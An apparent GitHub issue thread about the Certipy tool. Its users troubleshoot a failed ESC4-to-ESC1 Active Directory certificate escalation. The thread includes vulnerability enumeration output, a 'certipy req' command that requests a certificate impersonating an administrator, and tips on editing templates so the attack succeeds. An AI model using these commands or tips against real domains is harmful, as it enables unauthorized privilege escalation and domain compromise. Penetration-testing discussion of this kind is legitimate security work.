Certipy
Certipy copied to clipboard
ly4k
ESC4 > ESC1 to CERTSRV_E_UNSUPPORTED_CERT_TYPE
amazing tool! but somehow i cant get this working. im not sure what the problem is, maybe the space in the CA Name?
Certificate Authorities
0
CA Name : testa brotstube GmbH
DNS Name : srv-dc01.testa.local
Certificate Subject : CN=testa brotstube GmbH
Certificate Serial Number : <REDACTED>
Certificate Validity Start : 2020-03-02 08:16:41+00:00
Certificate Validity End : 2030-03-02 09:03:05+00:00
Web Enrollment : Enabled
User Specified SAN : Enabled
Request Disposition : Issue
Enforce Encryption for Requests : Disabled
Permissions
Owner : testa.LOCAL\Administrators
Access Rights
ManageCertificates : testa.LOCAL\Administrators
testa.LOCAL\Domänen-Admins
testa.LOCAL\Organisations-Admins
ManageCa : testa.LOCAL\Administrators
testa.LOCAL\Domänen-Admins
testa.LOCAL\Organisations-Admins
Enroll : testa.LOCAL\Authenticated Users
[!] Vulnerabilities
ESC6 : Enrollees can specify SAN and Request Disposition is set to Issue. Does not work after May 2022
ESC8 : Web Enrollment is enabled and Request Disposition is set to Issue
ESC11 : Encryption is not enforced for ICPR requests and Request Disposition is set to Issue
Certificate Templates
0
Template Name : Exchange-SHA256-5y
Display Name : Exchange-SHA256-5y
Certificate Authorities : testa brotstube GmbH
Enabled : True
Client Authentication : True
Enrollment Agent : True
Any Purpose : True
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16777216
65536
ExportableKey
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 5 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Object Control Permissions
Owner : testa.LOCAL\Administrator
Full Control Principals : testa.LOCAL\Authenticated Users
Write Owner Principals : testa.LOCAL\Authenticated Users
Write Dacl Principals : testa.LOCAL\Authenticated Users
Write Property Principals : testa.LOCAL\Authenticated Users
[!] Vulnerabilities
ESC1 : 'testa.LOCAL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
ESC2 : 'testa.LOCAL\\Authenticated Users' can enroll and template can be used for any purpose
ESC3 : 'testa.LOCAL\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set
ESC4 : 'testa.LOCAL\\Authenticated Users' has dangerous permissions
certipy req -u [email protected] -p passw0rd -ca 'testa brotstube GmbH' -template Exchange-SHA256-5y -upn [email protected] -debug
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'SRV-DC01.testa.LOCAL' at '172.16.10.2'
[+] Resolved 'SRV-DC01.testa.LOCAL' from cache: 172.16.10.1
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:172.16.10.1[\pipe\cert]
[+] Connected to endpoint: ncacn_np:172.16.10.1[\pipe\cert]
[-] Got error while trying to request certificate: code: 0x80094800 - CERTSRV_E_UNSUPPORTED_CERT_TYPE - The requested certificate template is not supported by this CA.
[*] Request ID is 383
find had some problems aswell but got me the templates and CA info in the end:
[*] Trying to get CA configuration for 'testa brotstube GmbH' via CSRA
[!] Got error while trying to get CA configuration for 'testa brotstube GmbH' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'testa brotstube GmbH' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'testa brotstube GmbH'
This is mostly because the certificate template you are using is not enabled. Run the certipy find command again with -enabled to get only enabled certificates.
thanks for the reply, but it says:
Enabled : True
doesnt that mean its enabled?
Had a similar Issue, for me it has been an error with how certipy changed the certificate. Try to request the cert manually through the UI if you have access to a Domain joined computer to see what exactly the error is.
If you do not have access, in my case I could not select a CSP so something was wrong there.
What I did was: Make a copy of the old cert template, run the ESC4 command again (to export the changed template) and then edit the CSP field to the original one. Then we use the command that would be used to restore the backup with our edited file. For me it worked, because a CSP was selected afterwards and I could proceed.
Thanks alot for the response! Sounds like that could work. I will have access to this system in some months and will re-test it then and report back!
same issue. Also, tried on the windows side, from a domain joined computer, through certmgr, I receive the following error: An error occurred while enrolling for a certificate. A certificate request could not be created. Url: test.local\test-ca Error: No provider was specified for the store or object (CRYPT_E_NO_PROVIDER). Could have something to do with the CSP, but how can that be specified?
